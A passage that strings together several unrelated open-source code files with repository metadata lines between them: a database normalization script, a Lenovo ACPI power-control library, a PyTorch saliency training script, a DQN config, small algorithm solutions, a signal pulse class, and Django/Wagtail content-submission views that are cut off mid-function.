with open('/content/dependency_parser.txt', 'r') as file:
lines = [line.strip() for line in file]
dependencies = {}
for line in lines:
left_hand_side, right_hand_side = line.split(" -> ")
left_hand_side = left_hand_side.split(", ")
dependencies[tuple(left_hand_side)] = right_hand_side.split(", ")
print('Dependencies:')
print(dependencies)
print('\n')
# Input from the user
target_normal_form = input(
'Choice of the highest normal form to reach (1: 1NF, 2: 2NF, 3: 3NF, B: BCNF, 4: 4NF, 5: 5NF):')
if target_normal_form in ["1", "2", "3", "4", "5"]:
target_normal_form = int(target_normal_form)
# Find the highest normal form of the input relation
find_high_nf = int(
input('Find the highest normal form of the input table? (1: Yes, 2: No):'))
high_nf = 'No normalization done.'
primary_key = input(
"Enter the Primary Key values: ").split(', ')
print('\n')
keys = ()
for key in primary_key:
keys = keys + (key,)
primary_key = keys
mvd_dependencies = {}
if not target_normal_form == 'B' and target_normal_form >= 4:
with open('/content/mvd_dependencies.txt', 'r') as file:
mvd_lines = [line.strip() for line in file]
print(mvd_lines)
for mvd in mvd_lines:
left_hand_side, right_hand_side = mvd.split(" ->-> ")
left_hand_side = left_hand_side.split(
", ") if ", " in left_hand_side else [left_hand_side]
left_hand_side_str = str(left_hand_side)
if left_hand_side_str in mvd_dependencies:
mvd_dependencies[left_hand_side_str].append(right_hand_side)
else:
mvd_dependencies[left_hand_side_str] = [right_hand_side]
print('Multi-valued Dependencies')
print(mvd_dependencies)
print('\n')
input_file = input_parser.input_parser(input_file)
if target_normal_form == 'B' or target_normal_form >= 1:
first_nf_table, flag_1nf = normalization_procedures.validate_first_nf(
input_file)
if flag_1nf:
high_nf = 'Highest Normal Form is: 1NF'
if target_normal_form == 1:
if flag_1nf:
print('Already Normalized to 1NF')
print('\n')
print('Queries after decomposing to 1NF:')
print('\n')
generate_1nf(primary_key, first_nf_table)
if target_normal_form == 'B' or target_normal_form >= 2:
second_nf_tables, flag_2nf = normalization_procedures.validate_second_nf(
first_nf_table, primary_key, dependencies)
if flag_1nf and flag_2nf:
high_nf = 'Highest Normal Form is: 2NF'
if target_normal_form == 2:
if flag_2nf and flag_1nf:
print('Already Normalized to 2NF')
print('\n')
print('Queries after decomposing to 2NF')
print('\n')
generate_2nf_3nf(second_nf_tables)
if target_normal_form == 'B' or target_normal_form >= 3:
third_nf_tables, flag_3nf = normalization_procedures.validate_third_nf(
second_nf_tables, primary_key, dependencies)
if flag_1nf and flag_2nf and flag_3nf:
high_nf = 'Highest Normal Form is: 3NF'
if target_normal_form == 3:
if flag_3nf and flag_2nf and flag_1nf:
print('Already Normalized to 3NF')
print('\n')
print('Queries after decomposing to 3NF')
print('\n')
generate_2nf_3nf(third_nf_tables)
if target_normal_form == 'B' or target_normal_form >= 4:
bcnf_tables, flag_bcnf = normalization_procedures.validate_bc_nf(
third_nf_tables, primary_key, dependencies)
if flag_1nf and flag_2nf and flag_3nf and flag_bcnf:
high_nf = 'Highest Normal Form is: BCNF'
if target_normal_form == 'B':
if flag_bcnf and flag_3nf and flag_2nf and flag_1nf:
print('Already Normalized to BCNF')
print('\n')
print('Queries after decomposing to BCNF')
print('\n')
generate_bcnf_4nf_5nf(bcnf_tables)
if not target_normal_form == 'B' and target_normal_form >= 4:
fourth_nf_tables, flag_4nf = normalization_procedures.validate_fourth_nf(
bcnf_tables, mvd_dependencies)
if flag_1nf and flag_2nf and flag_3nf and flag_bcnf and flag_4nf:
high_nf = 'Highest Normal Form is: 4NF'
if target_normal_form == 4:
if flag_4nf and flag_bcnf and flag_3nf and flag_2nf and flag_1nf:
print('Already Normalized to 4NF')
print('\n')
print('Queries after decomposing to 4NF')
print('\n')
generate_bcnf_4nf_5nf(fourth_nf_tables)
if not target_normal_form == 'B' and target_normal_form >= 5:
fifth_nf_tables, flag_5nf = normalization_procedures.validate_fifth_nf(
fourth_nf_tables, primary_key, dependencies)
if flag_1nf and flag_2nf and flag_3nf and flag_bcnf and flag_4nf and flag_5nf:
high_nf = 'Highest Normal Form is: 5NF'
if target_normal_form == 5:
if flag_5nf and flag_4nf and flag_bcnf and flag_3nf and flag_2nf and flag_1nf:
print('Already Normalized to 5NF')
print('\n')
print('Queries after decomposing to 5NF')
print('\n')
generate_bcnf_4nf_5nf(fifth_nf_tables)
if find_high_nf == 1:
print('\n')
print(high_nf)
print('\n')
| hemanthmandava2181/Database-Project | main.py | main.py | py | 5,794 | python | en | code | 0 | github-code | 90 |
72481009576 | class IPPowerError(Exception):
pass
class IPPowerValueError(IPPowerError):
def get_bad_value(self):
try:
return self._bad_value
except AttributeError:
return None
def set_bad_value(self, bad_value):
self._bad_value = bad_value
return self
class IPPowerAccessError(IPPowerError):
def get_description(self):
try:
return self._description
except AttributeError:
return None
def set_description(self, description):
self._description = description
return self
class IPPowerVerificationError(IPPowerError):
pass
class IPPower:
LIBRARY_VERSION = 1
_ACPI_CALL_PATH = "/proc/acpi/call"
# Values of these constants are taken from the Arch Wiki:
# https://wiki.archlinux.org/index.php/Lenovo_IdeaPad_5_15are05
IP_PERFMODE_INTELLIGENT = r'0x000FB001'
IP_PERFMODE_PERFORMANCE = r'0x0012B001'
IP_PERFMODE_BATTERYSAVE = r'0x0013B001'
IP_RAPIDCHARGE_ON = r'0x07'
IP_RAPIDCHARGE_OFF = r'0x08'
IP_BATCONSERV_ON = r'0x03'
IP_BATCONSERV_OFF = r'0x05'
_ACPI_GET_PERFMODE = r'\_SB.PCI0.LPC0.EC0.SPMO'
_ACPI_GET_RAPIDCHARGE = r'\_SB.PCI0.LPC0.EC0.QCHO'
_ACPI_GET_BATCONSERV = r'\_SB.PCI0.LPC0.EC0.BTSM'
_ACPI_SET_PERFMODE = r'\_SB.PCI0.LPC0.EC0.VPC0.DYTC'
_ACPI_SET_RAPIDCHARGE = r'\_SB.PCI0.LPC0.EC0.VPC0.SBMC'
_ACPI_SET_BATCONSERV = r'\_SB.PCI0.LPC0.EC0.VPC0.SBMC'
def __init__(self, show_debug_msgs=False):
self._show_debug_msgs = show_debug_msgs
import os
if not os.path.exists(self._ACPI_CALL_PATH):
raise IPPowerAccessError("The ACPI call interface doesn't exist on this system!").set_description('"{}" is missing (install the acpi_call kernel module)'.format(self._ACPI_CALL_PATH))
if not os.access(self._ACPI_CALL_PATH, os.R_OK | os.W_OK):
raise IPPowerAccessError("You are not permitted to access the ACPI call interface!").set_description('"{}" isn\'t accessible for reading or writing (try running the program as root)'.format(self._ACPI_CALL_PATH))
def _debug_msg(self, *args):
if self._show_debug_msgs:
import sys
import time
print("[{} libippower DEBUG]".format(time.strftime("%Y-%m-%d %H:%M:%S")), *args, file=sys.stderr)
def _acpi_call_read(self):
with open(self._ACPI_CALL_PATH) as call_file:
ret = call_file.read().strip().split("\x00")[0].strip()
self._debug_msg("Read from ACPI call interface:", ret)
return ret
def _acpi_call_write(self, write_data):
with open(self._ACPI_CALL_PATH, "w") as call_file:
print(write_data, file=call_file)
self._debug_msg("Written to ACPI call interface:", write_data)
def _generic_get(self, acpi_path):
self._acpi_call_write(acpi_path)
return self._acpi_call_read()
def _generic_set(self, acpi_path, value):
call_value = (acpi_path + " " + value)
self._acpi_call_write(call_value)
def get_perfmode(self):
perfmode = self._generic_get(self._ACPI_GET_PERFMODE)
if perfmode == "0x0":
return self.IP_PERFMODE_INTELLIGENT
if perfmode == "0x1":
return self.IP_PERFMODE_PERFORMANCE
if perfmode == "0x2":
return self.IP_PERFMODE_BATTERYSAVE
raise IPPowerValueError("An invalid performance mode was returned by the ACPI!").set_bad_value(perfmode)
def get_rapidcharge(self):
rapidcharge = self._generic_get(self._ACPI_GET_RAPIDCHARGE)
if rapidcharge == "0x0":
return self.IP_RAPIDCHARGE_OFF
if rapidcharge == "0x1":
return self.IP_RAPIDCHARGE_ON
raise IPPowerValueError("An invalid rapid charge status was returned by the ACPI!").set_bad_value(rapidcharge)
def get_batconserv(self):
batconserv = self._generic_get(self._ACPI_GET_BATCONSERV)
if batconserv == "0x0":
return self.IP_BATCONSERV_OFF
if batconserv == "0x1":
return self.IP_BATCONSERV_ON
raise IPPowerValueError("An invalid battery conservation status was returned by the ACPI!").set_bad_value(batconserv)
def set_perfmode(self, perfmode):
if perfmode != self.IP_PERFMODE_INTELLIGENT and perfmode != self.IP_PERFMODE_PERFORMANCE and perfmode != self.IP_PERFMODE_BATTERYSAVE:
raise IPPowerValueError("An invalid performance mode was provided!").set_bad_value(perfmode)
self._generic_set(self._ACPI_SET_PERFMODE, perfmode)
if perfmode != self.get_perfmode():
raise IPPowerVerificationError("Failed to verify whether the performance mode was set correctly!")
def set_rapidcharge(self, rapidcharge):
if rapidcharge != self.IP_RAPIDCHARGE_ON and rapidcharge != self.IP_RAPIDCHARGE_OFF:
raise IPPowerValueError("An invalid rapid charge status was provided!").set_bad_value(rapidcharge)
# simulating the behaviour of the Lenovo Vantage software
if rapidcharge == self.IP_RAPIDCHARGE_ON and self.get_batconserv() != self.IP_BATCONSERV_OFF:
self.set_batconserv(self.IP_BATCONSERV_OFF)
self._generic_set(self._ACPI_SET_RAPIDCHARGE, rapidcharge)
if rapidcharge != self.get_rapidcharge():
raise IPPowerVerificationError("Failed to verify whether the rapid charge status was set correctly!")
def set_batconserv(self, batconserv):
if batconserv != self.IP_BATCONSERV_ON and batconserv != self.IP_BATCONSERV_OFF:
raise IPPowerValueError("An invalid battery conservation status was provided!").set_bad_value(batconserv)
# simulating the behaviour of the Lenovo Vantage software
if batconserv == self.IP_BATCONSERV_ON and self.get_rapidcharge() != self.IP_RAPIDCHARGE_OFF:
self.set_rapidcharge(self.IP_RAPIDCHARGE_OFF)
self._generic_set(self._ACPI_SET_BATCONSERV, batconserv)
if batconserv != self.get_batconserv():
raise IPPowerVerificationError("Failed to verify whether the battery conservation status was set correctly!")
| ethernetlord/ippower | libippower.py | libippower.py | py | 6,178 | python | en | code | 0 | github-code | 90 |
13393792278 | from model import *
from config import *
import torch.optim as optim
from collections import OrderedDict
def load(path):
state_dict = torch.load(path)
state_dict_rename = OrderedDict()
for k, v in state_dict.items():
name = k[7:] # remove `module.`
state_dict_rename[name] = v
#print(state_dict_rename)
#model.load_state_dict(state_dict_rename)
return state_dict_rename
D_E = DSS(*extra_layer(vgg(base['dss'], 3), extra['dss']),e_extract_layer(),nums =BATCH_SIZE).cuda()
#initialize_weights(D_E)
#D_E.base.load_state_dict(torch.load('../vgg16_feat.pth'))
#print(D_E)
D_E.load_state_dict(load('D:\WRm/checkpoints/D_Eepoch3.pkl'))
D_E =nn.DataParallel(D_E).cuda()
U = D_U().cuda()
#initialize_weights(U)
U.load_state_dict(load('D:\WRm/checkpoints/Uepoch3.pkl'))
U =nn.DataParallel(U)
#D_E.base.load_state_dict(torch.load('/home/neverupdate/Downloads/SalGAN-master/weights/vgg16_feat.pth'))
#D_E.load_state_dict(torch.load('./checkpoints/D_Eepoch3.pkl'))
#U.load_state_dict(torch.load('./checkpoints/Uepoch3.pkl'))
DE_optimizer = optim.Adam(D_E.parameters(), lr=config.D_LEARNING_RATE,betas=(0.5,0.999))
U_optimizer = optim.Adam(U.parameters(), lr=config.U_LEARNING_RATE, betas=(0.5, 0.999))
TR_sal_dirs = [ ("D:\WRM/DUTS/DUTS-TR/DUTS-TR-Image",
"D:\WRM/DUTS/DUTS-TR/DUTS-TR-Mask")]
TR_ed_dir = [("./images/train",
"./bon/train")]
TE_sal_dirs = [("D:\WRM/ECSSD (2)/ECSSD-Image",
"D:\WRM/ECSSD (2)/ECSSD-Mask")]
TE_ed_dir = [("./images/test",
"./bon/test")]
def DATA(sal_dirs,ed_dir,trainable):
S_IMG_FILES = []
S_GT_FILES = []
E_IMG_FILES = []
E_GT_FILES = []
for dir_pair in sal_dirs:
X, y = process_data_dir(dir_pair[0]), process_data_dir(dir_pair[1])
S_IMG_FILES.extend(X)
S_GT_FILES.extend(y)
for dir_pair in ed_dir:
X, y = process_data_dir(dir_pair[0]), process_data_dir(dir_pair[1])
E_IMG_FILES.extend(X)
E_GT_FILES.extend(y)
S_IMGS_train, S_GT_train = S_IMG_FILES, S_GT_FILES
E_IMGS_train, E_GT_train = E_IMG_FILES, E_GT_FILES
folder = DataFolder(S_IMGS_train, S_GT_train, E_IMGS_train, E_GT_train, trainable)
if trainable:
data = DataLoader(folder, batch_size=BATCH_SIZE, num_workers=2, shuffle=trainable)
else:
data = DataLoader(folder, batch_size=1, num_workers=2, shuffle=trainable)
return data
train_data = DATA(TR_sal_dirs,TR_ed_dir,trainable=True)
test_data = DATA(TE_sal_dirs,TE_ed_dir,trainable=False)
def cal_eLoss(edges,label):
loss = 0
w =[1,1,1,1,1,5]
for i in range(6):
#print(label[i].shape)
#print(edges[i].shape)
loss += w[i]*F.binary_cross_entropy(edges[i],label)/10
return loss
def cal_s_mLoss(maps,label):
loss = 0
w = [1, 1, 1, 1, 1, 1]
for i in range(6):
loss =loss+ w[i]*F.binary_cross_entropy( maps[i],label) / 6
return loss
def cal_s_eLoss(es,label):
loss = 0
w =[1,1,1,1,1]
for i in range(5):
loss =loss+w[i]* F.binary_cross_entropy(es[i],label)/5
return loss
def cal_e_mLoss(e_m,label):
loss=0
w = [1, 1, 1, 1, 1, 1]
for i in range(5):
loss =loss+ w[i] * F.binary_cross_entropy(e_m[i],label) / 5
return loss
def cal_s_e2mLoss(e_m,maps):
loss = 0
w = [1, 1, 1, 1, 1, 1]
for i in range(5):
loss = loss+ w[i] * F.binary_cross_entropy( e_m[i],maps[i]) / 5
return loss
best_eval = None
ma = 0
def main(train_data,test_data):
best_eval = None
ma = 0
for epoch in range(1, NUM_EPOCHS + 1):
sum_train_mae = 0
sum_train_loss = 0
x = 0
##train
for iter_cnt, (img, img_e, sal_l, sal_e, ed_l, name) in enumerate(train_data):
D_E.train()
U.train()
x = x + 1
print('training start!!')
# for iter, (x_, _) in enumerate(train_data):
img = Variable(img.cuda()) # ,Variable(z_.cuda())
img_e = Variable(img_e.cuda())
sal_l = Variable(sal_l.cuda(), requires_grad=False)
sal_e = Variable(sal_e.cuda(), requires_grad=False)
ed_l = Variable(ed_l, requires_grad=False).cuda()
##########DSS#########################
######train dis
dd = True
if dd == True:
##fake
f, edges, e_s, e = D_E(img,img_e)
ff = list()
for i in range(5):
ff.append(f[i].detach())
edges_L = cal_eLoss(edges,ed_l)
e_s_L = cal_e_mLoss(e_s, sal_l)
e_L = cal_s_eLoss(e, sal_e)
#s_m_L = cal_s_mLoss(s, sal_l)
# masks, es = U(f)
# pre_ms_l = 0
# pre_es_l = 0
# ma = torch.abs(sal_l - masks[1]).mean()
# pre_m_l = F.binary_cross_entropy(masks[1], sal_l)
# for i in range(2):
# pre_ms_l += F.binary_cross_entropy(masks[1], sal_l)
# pre_es_l += F.binary_cross_entropy(es[1], sal_e)
DE_optimizer.zero_grad()
DE_l_1 = 5 * e_s_L + 10*e_L + 5*edges_L
DE_l_1.backward()
DE_optimizer.step()
uu = True
if uu == True:
masks, es = U(ff)
# mmm = masks[2].detach().cpu().numpy()
# print(mmm.shape)
# mmmmm = Image.fromarray(mmm[0,0,:,:])
# mmmmm.save('1.png')
# cv2.imshow('1.png',mmm[0,0,:,:]*255)
# cv2.waitKey()
pre_ms_l = 0
pre_es_l = 0
ma = torch.abs(sal_l - masks[2]).mean()
# print(ma)
pre_m_l = F.binary_cross_entropy(masks[2], sal_l)
for i in range(2):
pre_ms_l += F.binary_cross_entropy(masks[i], sal_l)
pre_es_l += F.binary_cross_entropy(es[i], sal_e)
U_l_1 = 50 * pre_m_l + 10 * pre_es_l + pre_ms_l
U_optimizer.zero_grad()
U_l_1.backward()
U_optimizer.step()
sum_train_mae += float(ma)
print(
"Epoch:{}\t iter:{} sum:{} \t mae:{}".format(epoch, x, len(train_data), sum_train_mae / (iter_cnt + 1)))
##########save model
# torch.save(D.state_dict(), './checkpoint/DSS/with_e_2/D15epoch%d.pkl' % epoch)
torch.save(D_E.state_dict(), 'D:\WRM/checkpoints/D_Eepoch%d.pkl' % epoch)
torch.save(U.state_dict(), 'D:\WRM/checkpoints/Uepoch%d.pkl' % epoch)
print('model saved')
###############test
eval1 = 0
eval2 = 0
t_mae = 0
for iter_cnt, (img, img_e, sal_l, sal_e, ed_l, name) in enumerate(test_data):
D_E.eval()
U.eval()
label_batch = Variable(sal_l).cuda()
img_eb = Variable(img_e).cuda()
print('val!!')
# for iter, (x_, _) in enumerate(train_data):
img_batch = Variable(img.cuda()) # ,Variable(z_.cuda())
f, edges, e_s, e = D_E(img_batch,img_eb)
masks, es = U(f)
mae_v2 = torch.abs(label_batch - masks[2]).mean().data[0]
# eval1 += mae_v1
eval2 += mae_v2
# m_eval1 = eval1 / (iter_cnt + 1)
m_eval2 = eval2 / (iter_cnt + 1)
print("test mae", m_eval2)
with open('results1.txt', 'a+') as f:
f.write(str(epoch) + " 2:" + str(m_eval2) + "\n")
if __name__ == '__main__':
main(train_data,test_data) | zhuxinang/MLMSNet | train.py | train.py | py | 7,698 | python | en | code | 2 | github-code | 90 |
16046215665 | # -*- encoding=utf-8 -*-
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
SCREEN_SIZE = [160, 200]
BAR_SIZE = [30, 3]
BALL_SIZE = [9, 9]
# 神经网络的输出
MOVE_STAY = [1, 0, 0]
MOVE_LEFT = [0, 1, 0]
MOVE_RIGHT = [0, 0, 1]
# learning_rate
LEARNING_RATE = 0.99
# 更新梯度
INITIAL_EPSILON = 1.0 # 0.5
FINAL_EPSILON = 0.1 # 0.05
# 测试观测次数
EXPLORE = 500000 # 500000
OBSERVE = 10000 # 50000
# 存储过往经验大小
REPLAY_MEMORY = 500000 # 500000
BATCH = 32
GAMMA = 0.99 # decay rate of past observations
'''
版本1:
1、初始化replay memory D 容量为N
2、用一个深度神经网络作为Q值网络,初始化权重参数
3、设定游戏片段总数M
4、初始化网络输入,大小为84*84*4,并且计算网络输出
5、以概率ϵ随机选择动作at或者通过网络输出的Q(max)值选择动作at
6、得到执行at后的奖励rt和下一个网络的输入
7、根据当前的值计算下一时刻网络的输出
8、将四个参数作为此刻的状态一起存入到D中(D中存放着N个时刻的状态)
9、随机从D中取出minibatch个状态
10、计算每一个状态的目标值(通过执行at后的reward来更新Q值作为目标值)
11、通过SGD更新weight
下在的是2015年的版本2:
1、初始化replay memory D,容量是N 用于存储训练的样本
2、初始化action-value function的Q卷积神经网络 ,随机初始化权重参数θ
3、初始化 target action-value function的Q^卷积神经网络,结构以及初始化权重θ和Q相同
4、设定游戏片段总数M
5、初始化网络输入,大小为84*84*4,并且计算网络输出
6、根据概率ϵ(很小)选择一个随机的动作或者根据当前的状态输入到当前的网络中 (用了一次CNN)计算出每个动作的Q值,选择Q值最大的一个动作(最优动作)
7、得到执行at后的奖励rt和下一个网络的输入
8、将四个参数作为此刻的状态一起存入到D中(D中存放着N个时刻的状态)
9、随机从D中取出minibatch个状态
10、计算每一个状态的目标值(通过执行at后的reward来更新Q值作为目标值)
11、通过SGD更新weight
12、每C次迭代后更新target action-value function网络的参数为当前action-value function的参数
参考文献:
一个 Q-learning 算法的简明教程
如何用简单例子讲解 Q - learning 的具体过程
《Code for a painless q-learning tutorial》以及百度网盘地址
DQN 从入门到放弃4 动态规划与Q-Learning
DQN从入门到放弃5 深度解读DQN算法
Deep Reinforcement Learning 基础知识(DQN方面)
Paper Reading 1 - Playing Atari with Deep Reinforcement Learning
Playing Atari with Deep Reinforcement Learning 论文及翻译百度网盘地址
Paper Reading 2:Human-level control through deep reinforcement learning
Human-level control through deep reinforcement learning 论文及翻译百度网盘地址
重磅 | 详解深度强化学习,搭建DQN详细指南(附论文)
Playing Atari with Deep Reinforcement Learning算法解读
''' | lichengzhang2005/deeplearning-pygame-dqn | dqn/config.py | config.py | py | 3,218 | python | zh | code | 0 | github-code | 90 |
18513419109 | S = input()
T = input()
if len(S)==1:
Flag = (S==T)
else:
Flag = False
for X in range(0,len(S)):
S = S[-1]+S[0:-1]
if S==T:
Flag = True
break
if Flag:
print('Yes')
else:
print('No') | Aasthaengg/IBMdataset | Python_codes/p03293/s623637409.py | s623637409.py | py | 241 | python | en | code | 0 | github-code | 90 |
18288666919 | import collections, copy
h, w = map(int, input().split())
maze = []
maze.append("#" * (w + 2))
for i in range(h):
maze.append("#" + input() + "#")
maze.append("#" * (w + 2))
dis = []
for i in range(h + 2):
temp = [-1] * (w + 2)
dis.append(temp)
def search(x, y):
dis2 = copy.deepcopy(dis)
move = [[-1, 0], [1, 0], [0, 1], [0, -1]]
queue = collections.deque([[x, y]])
dis2[x][y] = 0
while queue:
test = queue.popleft()
for i in move:
place = [test[0] + i[0], test[1] + i[1]]
if maze[place[0]][place[1]] == ".":
if dis2[place[0]][place[1]] == -1:
dis2[place[0]][place[1]] = dis2[test[0]][test[1]] + 1
queue.append(place)
return max([max([dis2[i][j] for j in range(w + 2)]) for i in range(h + 2)])
ans = 0
for i in range(h):
for j in range(w):
if maze[i + 1][j + 1] == ".":
dist = search(i + 1, j + 1)
ans = max(ans, dist)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02803/s121796436.py | s121796436.py | py | 1,001 | python | en | code | 0 | github-code | 90 |
9114349135 |
from os import walk, system
from pprint import pprint
c2 = input("What to look for ? : ")
l = []
for a, b, c in walk("src/"):
for c1 in c:
if c1.endswith(".java"):
with open(a + "/" + c1, "r") as f:
for line in f.readlines():
if line.count(c2) > 0:
l += [c1, line.replace("\t", "").replace("\n", "")]
pprint(l)
system("pause")
| AtomicMaya/BikeGame | test.py | test.py | py | 415 | python | en | code | 0 | github-code | 90 |
70591427497 | from abc import ABC, abstractmethod
from typing import Tuple
import numpy as np
import scipy.integrate
class Pulse(ABC):
def __init__(
self,
baud_rate: float = 10e9,
num_symbols: float = 1e3,
samples_per_symbol: float = 2**5,
):
self.baud_rate = baud_rate
self.num_symbols = num_symbols
self.samples_per_symbol = samples_per_symbol
self.T0 = 1 / self.baud_rate
@abstractmethod
def data(self) -> Tuple[np.ndarray, np.ndarray]:
"""Return the pulse shape and the time axis."""
pass
class RaisedCosinePulse(Pulse):
def __init__(
self,
baud_rate: float = 10e9,
num_symbols: float = 1e3,
samples_per_symbol: float = 2**5,
rolloff: float = 0.1,
):
super().__init__(baud_rate, num_symbols, samples_per_symbol)
self.rolloff = rolloff
self._generate()
def data(self) -> Tuple[np.ndarray, np.ndarray]:
return self.g, self.t
def _generate(self):
dt = self.T0 / self.samples_per_symbol
Ndt = self.samples_per_symbol * self.num_symbols
t = np.arange(-Ndt / 2, Ndt / 2) * dt
df = 1 / (max(t) - min(t))
dw = 2 * np.pi * df
f = np.arange(-Ndt / 2, Ndt / 2) * df
rof = self.rolloff
R = rof
rate = 1 / self.T0
freq = f
wind1 = np.zeros_like(f)
wind1[np.abs(freq) <= rate * (1 + R) / 2] = 1
wind2 = np.zeros_like(f)
wind2[np.abs(freq) >= rate * (1 - R) / 2] = 1
wind = wind1 * wind2
# wind1[np.abs(freq) >= R * (1 - R) / 2] = 1
gf = (1 - wind) + wind * 0.5 * (
1 + np.cos(np.pi / R / rate * (np.abs(freq) - rate * (1 - R) / 2))
)
gf[np.abs(freq) > rate * (1 + R) / 2] = 0
gt = np.real(np.fft.ifftshift(np.fft.ifft(np.fft.fftshift(gf))))
energy = scipy.integrate.trapezoid(np.abs(gt) ** 2, t)
gt = gt / np.sqrt(energy)
self.t = t
self.g = gt
| geeanlooca/PyNLIN | pynlin/pulses.py | pulses.py | py | 2,021 | python | en | code | 3 | github-code | 90 |
13064565866 | from datetime import datetime
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.template.defaultfilters import slugify
from wagtail.admin.utils import send_notification
from .forms import BlogForm, CaseStudyForm, FlowJSONFileForm, ImageForm, MarketplaceEntryForm
from .models import (
BlogPageTag,
Country,
CountryCaseStudy,
CountryMarketplaceEntry,
Expertise,
ExpertiseMarketplaceEntry,
FocusArea,
FocusAreaCaseStudy,
MarketplaceIndexPage,
Organization,
OrganizationCaseStudy,
Region,
RegionCaseStudy,
RegionMarketplaceEntry,
Service,
ServiceMarketplaceEntry,
Tag,
)
def submit_marketplace_entry(request, marketplace_index):
form = MarketplaceEntryForm(data=request.POST or None, label_suffix='')
# If the user uploaded a logo we want the logo_form to validate it is a
# valid image, but if no logo file was uploaded then proceed with an
# unbound ImageForm. This avoids re-display due to errors in the main form
# erroneously telling the user that the logo file is required (it is required
# for that form, but the entire form is optional).
if request.FILES:
logo_form = ImageForm(data=request.POST, files=request.FILES, label_suffix='')
logo_form_valid = logo_form.is_valid()
else:
logo_form = ImageForm(label_suffix='')
logo_form_valid = True
if request.method == 'POST' and form.is_valid() and logo_form_valid:
marketplace_entry_page = form.save(commit=False)
marketplace_entry_page.slug = slugify(marketplace_entry_page.title)
marketplace_entry = marketplace_index.add_child(instance=marketplace_entry_page)
if marketplace_entry:
marketplace_entry.unpublish()
if request.FILES:
logo_image = logo_form.save(commit=False)
logo_image.title = "Logo for %s" % marketplace_entry_page.title
logo_image.save()
marketplace_entry.logo_image = logo_image
for service in request.POST.getlist('services'):
ServiceMarketplaceEntry.objects.create(
service=Service.objects.get(id=service),
page=marketplace_entry
)
if request.POST.get('services_additional'):
for service_name in request.POST.get('services_additional').split(","):
service_name = service_name.lstrip().rstrip().capitalize()
service, created = Service.objects.get_or_create(name=service_name)
ServiceMarketplaceEntry.objects.create(
service=service,
page=marketplace_entry
)
for expertise in request.POST.getlist('expertise'):
ExpertiseMarketplaceEntry.objects.create(
expertise=Expertise.objects.get(id=expertise),
page=marketplace_entry
)
if request.POST.get('expertise_additional'):
for expertise_name in request.POST.get('expertise_additional').split(","):
expertise_name = expertise_name.lstrip().rstrip().capitalize()
expertise, created = Expertise.objects.get_or_create(name=expertise_name)
ExpertiseMarketplaceEntry.objects.create(
expertise=expertise,
page=marketplace_entry
)
for region in request.POST.getlist('regions_experience'):
RegionMarketplaceEntry.objects.create(
region=Region.objects.get(id=region),
page=marketplace_entry
)
for country in request.POST.getlist('countries_experience'):
CountryMarketplaceEntry.objects.create(
country=Country.objects.get(id=country),
page=marketplace_entry
)
# Submit page for moderation. This requires first saving a revision.
marketplace_entry.save_revision(submitted_for_moderation=True)
# Then send the notification. Last param None means do not exclude any
# moderators from email (internally wagtail would exclude the user
# submitting from such emails, be we are submitting something from an
# anonymous user, so no one should be excluded from the email).
send_notification(marketplace_entry.get_latest_revision().id, 'submitted', None)
return HttpResponseRedirect(marketplace_index.url + marketplace_index.reverse_subpage('thanks'))
services = Service.objects.order_by('name')
expertise_list = Expertise.objects.order_by('name')
countries = Country.objects.order_by('name')
regions = Region.objects.order_by('name')
base_year = datetime.today().year
years = [base_year - x for x in range(0, 100)]
context = {
'form': form,
'logo_form': logo_form,
'services': services,
'years': years,
'expertise_list': expertise_list,
'countries': countries,
'regions': regions,
'marketplace_index': marketplace_index,
}
return render(request, 'portal_pages/marketplace_entry_page_add.html', context)
def submit_blog(request, blog_index):
form = BlogForm(data=request.POST or None, label_suffix='')
if request.method == 'POST' and form.is_valid():
blog_page = form.save(commit=False)
blog_page.slug = slugify(blog_page.title)
blog = blog_index.add_child(instance=blog_page)
if blog:
blog.unpublish()
for tag in request.POST.getlist('tags'):
BlogPageTag.objects.create(tag=Tag.objects.get(id=tag),
content_object=blog)
if request.POST.get('tags_additional'):
for tag_name in request.POST.get('tags_additional').split(","):
tag_name = tag_name.lstrip().rstrip()
tag, created = Tag.objects.get_or_create(name=tag_name)
BlogPageTag.objects.create(
tag=tag,
content_object=blog
)
# Submit page for moderation. This requires first saving a revision.
blog.save_revision(submitted_for_moderation=True)
# Then send the notification. Last param None means do not exclude any
# moderators from email (internally wagtail would exclude the user
# submitting from such emails, be we are submitting something from an
# anonymous user, so no one should be excluded from the email).
send_notification(blog.get_latest_revision().id, 'submitted', None)
return HttpResponseRedirect(blog_index.url + blog_index.reverse_subpage('thanks'))
tags = Tag.objects.filter(portal_pages_blogpagetag_items__isnull=False).order_by('name').distinct('name')
context = {
'form': form,
'tags': tags,
'blog_index': blog_index,
}
return render(request, 'portal_pages/blog_page_add.html', context)
def submit_case_study(request, case_study_index):
form = CaseStudyForm(data=request.POST or None, label_suffix='')
# If the user uploaded a flow document we want the flow_json_file_form to validate it is a
# valid document, but if no file was uploaded then proceed with an
# unbound FlowJSONFileForm. This avoids re-display due to errors in the main form
# erroneously telling the user that the flow file is required (it is required
# for that form, but the entire form is optional).
if request.FILES:
flow_json_file_form = FlowJSONFileForm(data=request.POST, files=request.FILES, label_suffix='')
flow_json_file_form_valid = flow_json_file_form.is_valid()
else:
flow_json_file_form = FlowJSONFileForm(label_suffix='')
flow_json_file_form_valid = True
if request.method == 'POST' and form.is_valid() and flow_json_file_form_valid:
case_study_page = form.save(commit=False)
if request.POST.get('year_start') and request.POST.get('month_start'):
full_date = request.POST.get('year_start') + '-' + request.POST.get('month_start') + '-01'
case_study_page.date = datetime.strptime(full_date, '%Y-%m-%d').date()
case_study_page.slug = slugify(case_study_page.title)
case_study = case_study_index.add_child(instance=case_study_page)
if case_study:
case_study.unpublish()
if request.FILES:
downloadable_package = flow_json_file_form.save(commit=False)
downloadable_package.title = "Document for %s" % case_study_page.title
downloadable_package.save()
case_study.downloadable_package = downloadable_package
for focus_area in request.POST.getlist('focus_areas'):
FocusAreaCaseStudy.objects.create(
focusarea=FocusArea.objects.get(id=focus_area),
page=case_study
)
if request.POST.get('focus_areas_additional'):
for focus_area_name in request.POST.get('focus_areas_additional').split(","):
focus_area_name = focus_area_name.lstrip().rstrip().capitalize()
focus_area, created = FocusArea.objects.get_or_create(name=focus_area_name)
FocusAreaCaseStudy.objects.create(
focusarea=focus_area,
page=case_study
)
for organization in request.POST.getlist('organizations'):
OrganizationCaseStudy.objects.create(
organization=Organization.objects.get(id=organization),
page=case_study
)
if request.POST.get('organizations_additional'):
